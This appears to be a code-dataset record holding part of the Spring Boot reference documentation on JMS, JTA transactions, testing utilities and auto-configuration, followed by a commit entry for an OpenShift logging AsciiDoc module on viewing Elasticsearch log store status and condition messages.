location:\n\n[source,properties,indent=0]\n----\n\tspring.jms.jndi-name=java:\/MyConnectionFactory\n----\n\n\n\n[[boot-features-using-jms-template]]\n[[boot-features-using-jms-sending]]\n==== Sending a message\nSpring's `JmsTemplate` is auto-configured and you can autowire it directly into your\nown beans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.jms.core.JmsTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final JmsTemplate jmsTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(JmsTemplate jmsTemplate) {\n\t\t\tthis.jmsTemplate = jmsTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nNOTE: {spring-javadoc}\/jms\/core\/JmsMessagingTemplate.{dc-ext}[`JmsMessagingTemplate`]\n(new in Spring 4.1) can be injected in a similar manner.\n\n\n\n[[boot-features-using-jms-receiving]]\n==== Receiving a message\n\nWhen the JMS infrastructure is present, any bean can be annotated with `@JmsListener` to\ncreate a listener endpoint. If no `JmsListenerContainerFactory` has been defined, a default\none is configured automatically.\n\nThe following component creates a listener endpoint on the `someQueue` destination:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\t@JmsListener(destination = \"someQueue\")\n\t\tpublic void processMessage(String content) { ... }\n\n\t}\n----\n\nCheck {spring-javadoc}\/jms\/annotation\/EnableJms.{dc-ext}[the javadoc of `@EnableJms`]\nfor more details.\n\n[[boot-features-jta]]\n== Distributed Transactions with JTA\nSpring Boot supports distributed JTA transactions across multiple XA resources using\neither an http:\/\/www.atomikos.com\/[Atomkos] or\nhttp:\/\/docs.codehaus.org\/display\/BTM\/Home[Bitronix] embedded transaction manager. JTA\ntransactions are also supported when deploying to a suitable Java EE Application Server.\n\nWhen a JTA environment is detected, Spring's `JtaTransactionManager` will be used to manage\ntransactions. Auto-configured JMS, DataSource and JPA beans will be upgraded to support\nXA transactions. You can use standard Spring idioms such as `@Transactional` to\nparticipate in a distributed transaction.\n\n\n\n=== Using an Atomikos transaction manager\nAtomikos is a popular open source transaction manager which can be embedded into your\nSpring Boot application. You can use the `spring-boot-starter-jta-atomikos` Starter POM to\npull in the appropriate Atomikos libraries. Spring Boot will auto-configure Atomikos and\nensure that appropriate `depends-on` settings are applied to your Spring Beans for correct\nstartup and shutdown ordering.\n\nBy default Atomikos transaction logs will be written to a `transaction-logs` folder in\nyour application home directory (the directory in which your application jar file\nresides). You can customize this directory by setting a `spring.jta.log-dir` property in\nyour `application.properties` file. Properties starting `spring.jta.` can also be used to\ncustomize the Atomikos `UserTransactionServiceIml`. See the\n{dc-spring-boot}\/jta\/atomikos\/AtomikosProperties.{dc-ext}[`AtomikosProperties` javadoc]\nfor complete details.\n\n\n\n=== Using a Bitronix transaction manager\nBitronix is another popular open source JTA transaction manager implementation. You can\nuse the `spring-boot-starter-jta-bitronix` starter POM to add the appropriate Birtronix\ndependencies to your project. As with Atomikos, Spring Boot will automatically configure\nBitronix and post-process your beans to ensure that startup and shutdown ordering is\ncorrect.\n\nBy default Bitronix transaction log files (`part1.btm` and `part2.btm`) will be written to\na `transaction-logs` folder in your application home directory. You can customize this\ndirectory by using the `spring.jta.log-dir` property. Properties starting `spring.jta.`\nare also bound to the `bitronix.tm.Configuration` bean, allowing for complete\ncustomization. See the http:\/\/btm.codehaus.org\/api\/2.0.1\/bitronix\/tm\/Configuration.html[Bitronix\ndocumentation] for details.\n\n\n\n=== Using a Java EE managed transaction manager\nIf you are packaging your Spring Boot application as a `war` or `ear` file and deploying\nit to a Java EE application server, you can use your application servers built-in\ntransaction manager. Spring Boot will attempt to auto-configure a transaction manager by\nlooking at common JNDI locations (`java:comp\/UserTransaction`,\n`java:comp\/TransactionManager` etc). If you are using a transaction service provided by\nyour application server, you will generally also want to ensure that all resources are\nmanaged by the server and exposed over JNDI. Spring Boot will attempt to auto-configure\nJMS by looking for a `ConnectionFactory` at the JNDI path `java:\/JmsXA` or\n`java:\/XAConnectionFactory` and you can use the\n<<boot-features-connecting-to-a-jndi-datasource, `spring.datasource.jndi-name` property>>\nto configure your `DataSource`.\n\n\n\n=== Mixing XA and non-XA JMS connections\nWhen using JTA, the primary JMS `ConnectionFactory` bean will be XA aware and participate\nin distributed transactions. In some situations you might want to process certain JMS\nmessages using a non-XA `ConnectionFactory`. For example, your JMS processing logic might\ntake longer than the XA timeout.\n\nIf you want to use a non-XA `ConnectionFactory` you can inject the\n`nonXaJmsConnectionFactory` bean rather than the `@Primary` `jmsConnectionFactory` bean.\nFor consistency the `jmsConnectionFactory` bean is also provided using the bean alias\n`xaJmsConnectionFactory`.\n\nFor example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t\/\/ Inject the primary (XA aware) ConnectionFactory\n\t@Autowired\n\tprivate ConnectionFactory defaultConnectionFactory;\n\n\t\/\/ Inject the XA aware ConnectionFactory (uses the alias and injects the same as above)\n\t@Autowired\n\t@Qualifier(\"xaJmsConnectionFactory\")\n\tprivate ConnectionFactory xaConnectionFactory;\n\n\t\/\/ Inject the non-XA aware ConnectionFactory\n\t@Autowired\n\t@Qualifier(\"nonXaJmsConnectionFactory\")\n\tprivate ConnectionFactory nonXaConnectionFactory;\n----\n\n\n\n=== Supporting an alternative embedded transaction manager\nThe {sc-spring-boot}\/jta\/XAConnectionFactoryWrapper.{sc-ext}[`XAConnectionFactoryWrapper`]\nand {sc-spring-boot}\/jta\/XADataSourceWrapper.{sc-ext}[`XADataSourceWrapper`] interfaces\ncan be used to support alternative embedded transaction managers. The interfaces are\nresponsible for wrapping `XAConnectionFactory` and `XADataSource` beans and exposing them\nas regular `ConnectionFactory` and `DataSource` beans which will transparently enroll in\nthe distributed transaction. DataSource and JMS auto-configuration will use JTA variants\nas long as you have a `JtaTransactionManager` bean and appropriate XA wrapper beans\nregistered within your `ApplicationContext`\n\nThe {sc-spring-boot}\/jta\/BitronixXAConnectionFactoryWrapper.{sc-ext}[BitronixXAConnectionFactoryWrapper]\nand {sc-spring-boot}\/jta\/BitronixXADataSourceWrapper.{sc-ext}[BitronixXADataSourceWrapper]\nprovide good examples of how to write XA wrappers.\n\n\n\n[[boot-features-integration]]\n== Spring Integration\nSpring Integration provides abstractions over messaging and also other transports such as\nHTTP, TCP etc. If Spring Integration is available on your classpath it will be initialized\nthrough the `@EnableIntegration` annotation. Message processing statistics will be\npublished over JMX if `'spring-integration-jmx'` is also on the classpath.\nSee the {sc-spring-boot-autoconfigure}\/integration\/IntegrationAutoConfiguration.{sc-ext}[`IntegrationAutoConfiguration`]\nclass for more details.\n\n\n\n[[boot-features-jmx]]\n== Monitoring and management over JMX\nJava Management Extensions (JMX) provide a standard mechanism to monitor and manage\napplications. By default Spring Boot will create an `MBeanServer` with bean id\n'`mbeanServer`' and expose any of your beans that are annotated with Spring JMX\nannotations (`@ManagedResource`, `@ManagedAttribute`, `@ManagedOperation`).\n\nSee the {sc-spring-boot-autoconfigure}\/jmx\/JmxAutoConfiguration.{sc-ext}[`JmxAutoConfiguration`]\nclass for more details.\n\n\n\n[[boot-features-testing]]\n== Testing\nSpring Boot provides a number of useful tools for testing your application. The\n`spring-boot-starter-test` POM provides Spring Test, JUnit, Hamcrest and Mockito\ndependencies. There are also useful test utilities in the core `spring-boot` module\nunder the `org.springframework.boot.test` package.\n\n\n\n[[boot-features-test-scope-dependencies]]\n=== Test scope dependencies\nIf you use the\n`spring-boot-starter-test` '`Starter POM`' (in the `test` `scope`), you will find\nthe following provided libraries:\n\n* Spring Test -- integration test support for Spring applications.\n* Junit -- The de-facto standard for unit testing Java applications.\n* Hamcrest -- A library of matcher objects (also known as constraints or predicates)\n allowing `assertThat` style JUnit assertions.\n* Mockito -- A Java mocking framework.\n\nThese are common libraries that we generally find useful when writing tests. You are free\nto add additional test dependencies of your own if these don't suit your needs.\n\n\n[[boot-features-testing-spring-applications]]\n=== Testing Spring applications\nOne of the major advantages of dependency injection is that it should make your code\neasier to unit test. You can simply instantiate objects using the `new` operator without\neven involving Spring. You can also use _mock objects_ instead of real dependencies.\n\nOften you need to move beyond '`unit testing`' and start '`integration testing`' (with\na Spring `ApplicationContext` actually involved in the process). It's useful to be able\nto perform integration testing without requiring deployment of your application or\nneeding to connect to other infrastructure.\n\nThe Spring Framework includes a dedicated test module for just such integration testing.\nYou can declare a dependency directly to `org.springframework:spring-test` or use the\n`spring-boot-starter-test` '`Starter POM`' to pull it in transitively.\n\nIf you have not used the `spring-test` module before you should start by reading the\n{spring-reference}\/#testing[relevant section] of the Spring Framework reference\ndocumentation.\n\n\n\n[[boot-features-testing-spring-boot-applications]]\n=== Testing Spring Boot applications\nA Spring Boot application is just a Spring `ApplicationContext` so nothing very special\nhas to be done to test it beyond what you would normally do with a vanilla Spring context.\nOne thing to watch out for though is that the external properties, logging and other\nfeatures of Spring Boot are only installed in the context by default if you use\n`SpringApplication` to create it.\n\nSpring Boot provides a `@SpringApplicationConfiguration` annotation as an alternative\nto the standard `spring-test` `@ContextConfiguration` annotation. If you use\n`@SpringApplicationConfiguration` to configure the `ApplicationContext` used in your\ntests, it will be created via `SpringApplication` and you will get the additional Spring\nBoot features.\n\nFor example:\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(classes = SampleDataJpaApplication.class)\n\tpublic class CityRepositoryIntegrationTests {\n\n\t\t@Autowired\n\t\tCityRepository repository;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nTIP: The context loader guesses whether you want to test a web application or not (e.g.\nwith `MockMVC`) by looking for the `@WebAppConfiguration` annotation. (`MockMVC` and\n`@WebAppConfiguration` are part of `spring-test`).\n\nIf you want a web application to start up and listen on its normal port, so you can test\nit with HTTP (e.g. using `RestTemplate`), annotate your test class (or one of its\nsuperclasses) with `@IntegrationTest`. This can be very useful because it means you can\ntest the full stack of your application, but also inject its components into the test\nclass and use them to assert the internal state of the application after an HTTP\ninteraction. For Example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(classes = SampleDataJpaApplication.class)\n\t@WebAppConfiguration\n\t@IntegrationTest\n\tpublic class CityRepositoryIntegrationTests {\n\n\t\t@Autowired\n\t\tCityRepository repository;\n\n\t\tRestTemplate restTemplate = new TestRestTemplate();\n\n\t\t\/\/ ... interact with the running server\n\n\t}\n----\n\nNOTE: Spring's test framework will cache application contexts between tests. Therefore,\nas long as your tests share the same configuration, the time consuming process of starting\nand stopping the server will only happen once, regardless of the number of tests that\nactually run.\n\nTo change the port you can add environment properties to `@IntegrationTest` as colon- or\nequals-separated name-value pairs, e.g. `@IntegrationTest(\"server.port:9000\")`.\nAdditionally you can set the `server.port` and `management.port` properties to `0`\nin order to run your integration tests using random ports. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(classes = MyApplication.class)\n\t@WebAppConfiguration\n\t@IntegrationTest({\"server.port=0\", \"management.port=0\"})\n\tpublic class SomeIntegrationTests {\n\n\t\t\/\/ ...\n\n\t}\n----\n\nSee <<howto-discover-the-http-port-at-runtime>> for a description of how you can discover\nthe actual port that was allocated for the duration of the tests.\n\n\n\n[[boot-features-testing-spring-boot-applications-with-spock]]\n==== Using Spock to test Spring Boot applications\nIf you wish to use Spock to test a Spring Boot application you should add a dependency\non Spock's `spock-spring` module to your application's build. `spock-spring` integrates\nSpring's test framework into Spock.\n\nPlease note that you cannot use the `@SpringApplicationConfiguration` annotation that was\n<<boot-features-testing-spring-boot-applications,described above>> as Spock\nhttps:\/\/code.google.com\/p\/spock\/issues\/detail?id=349[does not find the\n`@ContextConfiguration` meta-annotation]. To work around this limitation, you should use\nthe `@ContextConfiguration` annotation directly and configure it to use the Spring\nBoot specific context loader:\n\n[source,groovy,indent=0]\n----\n\t@ContextConfiguration(loader = SpringApplicationContextLoader.class)\n\tclass ExampleSpec extends Specification {\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\n\n[[boot-features-test-utilities]]\n=== Test utilities\nA few test utility classes are packaged as part of `spring-boot` that are generally\nuseful when testing your application.\n\n\n\n[[boot-features-configfileapplicationcontextinitializer-test-utility]]\n==== ConfigFileApplicationContextInitializer\n`ConfigFileApplicationContextInitializer` is an `ApplicationContextInitializer` that\ncan apply to your tests to load Spring Boot `application.properties` files. You can use\nthis when you don't need the full features provided by `@SpringApplicationConfiguration`.\n\n[source,java,indent=0]\n----\n\t@ContextConfiguration(classes = Config.class,\n\t\tinitializers = ConfigFileApplicationContextInitializer.class)\n----\n\n\n\n[[boot-features-environment-test-utilities]]\n==== EnvironmentTestUtils\n`EnvironmentTestUtils` allows you to quickly add properties to a\n`ConfigurableEnvironment` or `ConfigurableApplicationContext`. Simply call it with\n`key=value` strings:\n\n[source,java,indent=0]\n----\nEnvironmentTestUtils.addEnvironment(env, \"org=Spring\", \"name=Boot\");\n----\n\n\n\n[[boot-features-output-capture-test-utility]]\n==== OutputCapture\n`OutputCapture` is a JUnit `Rule` that you can use to capture `System.out` and\n`System.err` output. Simply declare the capture as a `@Rule` then use `toString()`\nfor assertions:\n\n[source,java,indent=0]\n----\nimport org.junit.Rule;\nimport org.junit.Test;\nimport org.springframework.boot.test.OutputCapture;\n\nimport static org.hamcrest.Matchers.*;\nimport static org.junit.Assert.*;\n\npublic class MyTest {\n\n\t@Rule\n\tpublic OutputCapture capture = new OutputCapture();\n\n\t@Test\n\tpublic void testName() throws Exception {\n\t\tSystem.out.println(\"Hello World!\");\n\t\tassertThat(capture.toString(), containsString(\"World\"));\n\t}\n\n}\n----\n\n[[boot-features-rest-templates-test-utility]]\n==== TestRestTemplate\n\n`TestRestTemplate` is a convenience subclass of Spring's `RestTemplate` that is\nuseful in integration tests. You can get a vanilla template or one that sends Basic HTTP\nauthentication (with a username and password). In either case the template will behave\nin a test-friendly way: not following redirects (so you can assert the response\nlocation), ignoring cookies (so the template is stateless), and not throwing exceptions\non server-side errors. It is recommended, but not mandatory, to use Apache HTTP Client\n(version 4.3.2 or better), and if you have that on your classpath the `TestRestTemplate`\nwill respond by configuring the client appropriately.\n\n[source,java,indent=0]\n----\npublic class MyTest {\n\n\tRestTemplate template = new TestRestTemplate();\n\n\t@Test\n\tpublic void testRequest() throws Exception {\n\t\tHttpHeaders headers = template.getForEntity(\"http:\/\/myhost.com\", String.class).getHeaders();\n\t\tassertThat(headers.getLocation().toString(), containsString(\"myotherhost\"));\n\t}\n\n}\n----\n\n\n\n[[boot-features-developing-auto-configuration]]\n== Developing auto-configuration and using conditions\nIf you work in a company that develops shared libraries, or if you work on an open-source\nor commercial library, you might want to develop your own auto-configuration.\nAuto-configuration classes can be bundled in external jars and still be picked-up by\nSpring Boot.\n\n\n\n[[boot-features-understanding-auto-configured-beans]]\n=== Understanding auto-configured beans\nUnder the hood, auto-configuration is implemented with standard `@Configuration` classes.\nAdditional `@Conditional` annotations are used to constrain when the auto-configuration\nshould apply. Usually auto-configuration classes use `@ConditionalOnClass` and\n`@ConditionalOnMissingBean` annotations. This ensures that auto-configuration only\napplies when relevant classes are found and when you have not declared your own\n`@Configuration`.\n\nYou can browse the source code of `spring-boot-autoconfigure` to see the `@Configuration`\nclasses that we provide (see the `META-INF\/spring.factories` file).\n\n\n\n[[boot-features-locating-auto-configuration-candidates]]\n=== Locating auto-configuration candidates\nSpring Boot checks for the presence of a `META-INF\/spring.factories` file within your\npublished jar. The file should list your configuration classes under the\n`EnableAutoConfiguration` key.\n\n[indent=0]\n----\n\torg.springframework.boot.autoconfigure.EnableAutoConfiguration=\\\n\tcom.mycorp.libx.autoconfigure.LibXAutoConfiguration,\\\n\tcom.mycorp.libx.autoconfigure.LibXWebAutoConfiguration\n----\n\nYou can use the\n{sc-spring-boot-autoconfigure}\/AutoConfigureAfter.{sc-ext}[`@AutoConfigureAfter`] or\n{sc-spring-boot-autoconfigure}\/AutoConfigureBefore.{sc-ext}[`@AutoConfigureBefore`]\nannotations if your configuration needs to be applied in a specific order. For example,\nif you provide web specific configuration, your class may need to be applied after\n`WebMvcAutoConfiguration`.\n\n\n\n[[boot-features-condition-annotations]]\n=== Condition annotations\nYou almost always want to include one or more `@Condition` annotations on your\nauto-configuration class. The `@ConditionalOnMissingBean` is one common example that is\nused to allow developers to '`override`' auto-configuration if they are not happy with\nyour defaults.\n\nSpring Boot includes a number of `@Conditional` annotations that you can reuse in your own\ncode by annotating `@Configuration` classes or individual `@Bean` methods.\n\n\n\n[[boot-features-class-conditions]]\n==== Class conditions\nThe `@ConditionalOnClass` and `@ConditionalOnMissingClass` annotations allows configuration\nto be skipped based on the presence or absence of specific classes. Due to the fact that\nannotation meta-data is parsed using http:\/\/asm.ow2.org\/[ASM] you can actually use the\n`value` attribute to refer to the real class, even though that class might not actually\nappear on the running application classpath. You can also use the `name` attribute if you\nprefer to specify the class name using a `String` value.\n\n\n\n[[boot-features-bean-conditions]]\n==== Bean conditions\nThe `@ConditionalOnBean` and `@ConditionalOnMissingBean` annotations allow configurations\nto be skipped based on the presence or absence of specific beans. You can use the `value`\nattribute to specify beans by type, or `name` to specify beans by name. The `search`\nattribute allows you to limit the `ApplicationContext` hierarchy that should be considered\nwhen searching for beans.\n\nNOTE: `@Conditional` annotations are processed when `@Configuration` classes are\nparsed. Auto-configure `@Configuration` is always parsed last (after any user defined\nbeans), however, if you are using these annotations on regular `@Configuration` classes,\ncare must be taken not to refer to bean definitions that have not yet been created.\n\n\n\n[[boot-features-resource-conditions]]\n==== Resource conditions\nThe `@ConditionalOnResource` annotation allows configuration to be included only when a\nspecific resource is present. Resources can be specified using the usual Spring\nconventions, for example, `file:\/home\/user\/test.dat`.\n\n\n\n[[boot-features-web-application-conditions]]\n==== Web Application Conditions\nThe `@ConditionalOnWebApplication` and `@ConditionalOnNotWebApplication` annotations\nallow configuration to be skipped depending on whether the application is a\n'web application'. A web application is any application that is using a Spring\n`WebApplicationContext`, defines a `session` scope or has a `StandardServletEnvironment`.\n\n\n\n[[boot-features-spel-conditions]]\n==== SpEL expression conditions\nThe `@ConditionalOnExpression` annotation allows configuration to be skipped based on the\nresult of a {spring-reference}\/#expressions[SpEL expression].\n\n\n\n[[boot-features-whats-next]]\n== What to read next\nIf you want to learn more about any of the classes discussed in this section you can\ncheck out the {dc-root}[Spring Boot API documentation] or you can browse the\n{github-code}[source code directly]. If you have specific questions, take a look at the\n<<howto.aoc#howto, how-to>> section.\n\nIf you are comfortable with Spring Boot's core features, you can carry on and read\nabout <<production-ready-features.adoc#production-ready, production-ready features>>.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8cb7f81116dfe84fc0141aa6d3fbfd02ae1ff371","subject":"RHDEVDOCS-3018 Document: [Logging 5.1]EO shouldn't try to upgrade ES cluster after adding\/removing storage.","message":"RHDEVDOCS-3018 Document: [Logging 5.1]EO shouldn't try to upgrade ES cluster after adding\/removing storage.\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/cluster-logging-log-store-status-viewing.adoc","new_file":"modules\/cluster-logging-log-store-status-viewing.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * logging\/cluster-logging-log-store.adoc\n\n[id=\"cluster-logging-log-store-comp-viewing_{context}\"]\n= Viewing the status of the log store\n\nYou can view the status of your log store.\n\n.Prerequisites\n\n* OpenShift Logging and Elasticsearch must be installed.\n\n.Procedure\n\n. Change to the `openshift-logging` project.\n+\n[source,terminal]\n----\n$ oc project openshift-logging\n----\n\n. To view the status:\n\n.. Get the name of the log store instance:\n+\n[source,terminal]\n----\n$ oc get Elasticsearch\n----\n+\n.Example output\n[source,terminal]\n----\nNAME AGE\nelasticsearch 5h9m\n----\n\n.. Get the log store status:\n+\n[source,terminal]\n----\n$ oc get Elasticsearch <Elasticsearch-instance> -o yaml\n----\n+\nFor example:\n+\n[source,terminal]\n----\n$ oc get Elasticsearch elasticsearch -n openshift-logging -o yaml\n----\n+\nThe output includes information similar to the following:\n+\n.Example output\n[source,terminal]\n----\nstatus: <1>\n cluster: <2>\n activePrimaryShards: 30\n activeShards: 60\n initializingShards: 0\n numDataNodes: 3\n numNodes: 3\n pendingTasks: 0\n relocatingShards: 0\n status: green\n unassignedShards: 0\n clusterHealth: \"\"\n conditions: [] <3>\n nodes: <4>\n - deploymentName: elasticsearch-cdm-zjf34ved-1\n upgradeStatus: {}\n - deploymentName: elasticsearch-cdm-zjf34ved-2\n upgradeStatus: {}\n - deploymentName: elasticsearch-cdm-zjf34ved-3\n upgradeStatus: {}\n pods: <5>\n client:\n failed: []\n notReady: []\n ready:\n - elasticsearch-cdm-zjf34ved-1-6d7fbf844f-sn422\n - elasticsearch-cdm-zjf34ved-2-dfbd988bc-qkzjz\n - elasticsearch-cdm-zjf34ved-3-c8f566f7c-t7zkt\n data:\n failed: []\n notReady: []\n ready:\n - elasticsearch-cdm-zjf34ved-1-6d7fbf844f-sn422\n - elasticsearch-cdm-zjf34ved-2-dfbd988bc-qkzjz\n - elasticsearch-cdm-zjf34ved-3-c8f566f7c-t7zkt\n master:\n failed: []\n notReady: []\n ready:\n - elasticsearch-cdm-zjf34ved-1-6d7fbf844f-sn422\n - elasticsearch-cdm-zjf34ved-2-dfbd988bc-qkzjz\n - elasticsearch-cdm-zjf34ved-3-c8f566f7c-t7zkt\n shardAllocationEnabled: all\n----\n<1> In the output, the cluster status fields appear in the `status` stanza.\n<2> The status of the log store:\n+\n* The number of active primary shards.\n* The number of active shards.\n* The number of shards that are initializing.\n* The number of log store data nodes.\n* The total number of log store nodes.\n* The number of pending tasks.\n* The log store status: `green`, `red`, `yellow`.\n* The number of unassigned shards.\n<3> Any status conditions, if present. The log store status indicates the reasons from the scheduler if a pod could not be placed. Any events related to the following conditions are shown:\n* Container Waiting for both the log store and proxy containers.\n* Container Terminated for both the log store and proxy containers.\n* Pod unschedulable.\nAlso, a condition is shown for a number of issues; see *Example condition messages*.\n<4> The log store nodes in the cluster, with `upgradeStatus`.\n<5> The log store client, data, and master pods in the cluster, listed under 'failed`, `notReady`, or `ready` state.\n\n[id=\"cluster-logging-elasticsearch-status-message_{context}\"]\n== Example condition messages\n\nThe following are examples of some condition messages from the `Status` section of the Elasticsearch instance.\n\n\/\/ https:\/\/github.com\/openshift\/elasticsearch-operator\/pull\/92\n\nThe following status message indicates that a node has exceeded the configured low watermark, and no shard will be allocated to this node.\n\n[source,yaml]\n----\nstatus:\n nodes:\n - conditions:\n - lastTransitionTime: 2019-03-15T15:57:22Z\n message: Disk storage usage for node is 27.5gb (36.74%). Shards will be not\n be allocated on this node.\n reason: Disk Watermark Low\n status: \"True\"\n type: NodeStorage\n deploymentName: example-elasticsearch-cdm-0-1\n upgradeStatus: {}\n----\n\nThe following status message indicates that a node has exceeded the configured high watermark, and shards will be relocated to other nodes.\n\n[source,yaml]\n----\nstatus:\n nodes:\n - conditions:\n - lastTransitionTime: 2019-03-15T16:04:45Z\n message: Disk storage usage for node is 27.5gb (36.74%). Shards will be relocated\n from this node.\n reason: Disk Watermark High\n status: \"True\"\n type: NodeStorage\n deploymentName: example-elasticsearch-cdm-0-1\n upgradeStatus: {}\n----\n\nThe following status message indicates that the log store node selector in the CR does not match any nodes in the cluster:\n\n[source,yaml]\n----\nstatus:\n nodes:\n - conditions:\n - lastTransitionTime: 2019-04-10T02:26:24Z\n message: '0\/8 nodes are available: 8 node(s) didn''t match node selector.'\n reason: Unschedulable\n status: \"True\"\n type: Unschedulable\n----\n\nThe following status message indicates that the log store CR uses a non-existent persistent volume claim (PVC).\n\n[source,yaml]\n----\nstatus:\n nodes:\n - conditions:\n - last Transition Time: 2019-04-10T05:55:51Z\n message: pod has unbound immediate PersistentVolumeClaims (repeated 5 times)\n reason: Unschedulable\n status: True\n type: Unschedulable\n----\n\nThe following status message indicates that your log store cluster does not have enough nodes to support the redundancy policy.\n\n[source,yaml]\n----\nstatus:\n clusterHealth: \"\"\n conditions:\n - lastTransitionTime: 2019-04-17T20:01:31Z\n message: Wrong RedundancyPolicy selected. Choose different RedundancyPolicy or\n add more nodes with data roles\n reason: Invalid Settings\n status: \"True\"\n type: InvalidRedundancy\n----\n\nThis status message indicates your cluster has too many control plane nodes (also known as the master nodes):\n\n[source,yaml]\n----\nstatus:\n clusterHealth: green\n conditions:\n - lastTransitionTime: '2019-04-17T20:12:34Z'\n message: >-\n Invalid master nodes count. Please ensure there are no more than 3 total\n nodes with master roles\n reason: Invalid Settings\n status: 'True'\n type: InvalidMasters\n----\n\n\nThe following status message indicates that Elasticsearch storage does not support the change you tried to make.\n\nFor example:\n[source,yaml]\n----\nstatus:\n clusterHealth: green\n conditions:\n - lastTransitionTime: \"2021-05-07T01:05:13Z\"\n message: Changing the storage structure for a custom resource is not supported\n reason: StorageStructureChangeIgnored\n status: 'True'\n type: StorageStructureChangeIgnored\n----\n\nThe `reason` and `type` fields specify the type of unsupported change:\n\n`StorageClassNameChangeIgnored`:: Unsupported change to the storage class name.\n`StorageSizeChangeIgnored`:: Unsupported change the storage size.\n`StorageStructureChangeIgnored`:: Unsupported change between ephemeral and persistent storage structures.\n+\n[IMPORTANT]\n====\nIf you try to configure the `ClusterLogging` custom resource (CR) to switch from ephemeral to persistent storage, the OpenShift Elasticsearch Operator creates a persistent volume claim (PVC) but does not create a persistent volume (PV). To clear the `StorageStructureChangeIgnored` status, you must revert the change to the `ClusterLogging` CR and delete the PVC.\n====\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * logging\/cluster-logging-log-store.adoc\n\n[id=\"cluster-logging-log-store-comp-viewing_{context}\"]\n= Viewing the status of the log store\n\nYou can view the status of your log store.\n\n.Prerequisites\n\n* OpenShift Logging and Elasticsearch must be installed.\n\n.Procedure\n\n. Change to the `openshift-logging` project.\n+\n[source,terminal]\n----\n$ oc project openshift-logging\n----\n\n. To view the status:\n\n.. Get the name of the log store instance:\n+\n[source,terminal]\n----\n$ oc get Elasticsearch\n----\n+\n.Example output\n[source,terminal]\n----\nNAME AGE\nelasticsearch 5h9m\n----\n\n.. Get the log store status:\n+\n[source,terminal]\n----\n$ oc get Elasticsearch <Elasticsearch-instance> -o yaml\n----\n+\nFor example:\n+\n[source,terminal]\n----\n$ oc get Elasticsearch elasticsearch -n openshift-logging -o yaml\n----\n+\nThe output includes information similar to the following:\n+\n.Example output\n[source,terminal]\n----\nstatus: <1>\n cluster: <2>\n activePrimaryShards: 30\n activeShards: 60\n initializingShards: 0\n numDataNodes: 3\n numNodes: 3\n pendingTasks: 0\n relocatingShards: 0\n status: green\n unassignedShards: 0\n clusterHealth: \"\"\n conditions: [] <3>\n nodes: <4>\n - deploymentName: elasticsearch-cdm-zjf34ved-1\n upgradeStatus: {}\n - deploymentName: elasticsearch-cdm-zjf34ved-2\n upgradeStatus: {}\n - deploymentName: elasticsearch-cdm-zjf34ved-3\n upgradeStatus: {}\n pods: <5>\n client:\n failed: []\n notReady: []\n ready:\n - elasticsearch-cdm-zjf34ved-1-6d7fbf844f-sn422\n - elasticsearch-cdm-zjf34ved-2-dfbd988bc-qkzjz\n - elasticsearch-cdm-zjf34ved-3-c8f566f7c-t7zkt\n data:\n failed: []\n notReady: []\n ready:\n - elasticsearch-cdm-zjf34ved-1-6d7fbf844f-sn422\n - elasticsearch-cdm-zjf34ved-2-dfbd988bc-qkzjz\n - elasticsearch-cdm-zjf34ved-3-c8f566f7c-t7zkt\n master:\n failed: []\n notReady: []\n ready:\n - elasticsearch-cdm-zjf34ved-1-6d7fbf844f-sn422\n - elasticsearch-cdm-zjf34ved-2-dfbd988bc-qkzjz\n - elasticsearch-cdm-zjf34ved-3-c8f566f7c-t7zkt\n shardAllocationEnabled: all\n----\n<1> In the output, the cluster status fields appear in the `status` stanza.\n<2> The status of the log store: \n+\n* The number of active primary shards.\n* The number of active shards. \n* The number of shards that are initializing.\n* The number of log store data nodes.\n* The total number of log store nodes.\n* The number of pending tasks.\n* The log store status: `green`, `red`, `yellow`.\n* The number of unassigned shards.\n<3> Any status conditions, if present. The log store status indicates the reasons from the scheduler if a pod could not be placed. Any events related to the following conditions are shown:\n* Container Waiting for both the log store and proxy containers.\n* Container Terminated for both the log store and proxy containers.\n* Pod unschedulable.\nAlso, a condition is shown for a number of issues, see *Example condition messages*.\n<4> The log store nodes in the cluster, with `upgradeStatus`. \n<5> The log store client, data, and master pods in the cluster, listed under 'failed`, `notReady` or `ready` state.\n\n[id=\"cluster-logging-elasticsearch-status-message_{context}\"]\n== Example condition messages\n\nThe following are examples of some condition messages from the `Status` section of the Elasticsearch instance.\n\n\/\/ https:\/\/github.com\/openshift\/elasticsearch-operator\/pull\/92\n\nThis status message indicates a node has exceeded the configured low watermark and no shard will be allocated to this node.\n\n[source,yaml]\n----\nstatus:\n nodes:\n - conditions:\n - lastTransitionTime: 2019-03-15T15:57:22Z\n message: Disk storage usage for node is 27.5gb (36.74%). Shards will be not\n be allocated on this node.\n reason: Disk Watermark Low\n status: \"True\"\n type: NodeStorage\n deploymentName: example-elasticsearch-cdm-0-1\n upgradeStatus: {}\n----\n\nThis status message indicates a node has exceeded the configured high watermark and shards will be relocated to other nodes.\n\n[source,yaml]\n----\nstatus:\n nodes:\n - conditions:\n - lastTransitionTime: 2019-03-15T16:04:45Z\n message: Disk storage usage for node is 27.5gb (36.74%). Shards will be relocated\n from this node.\n reason: Disk 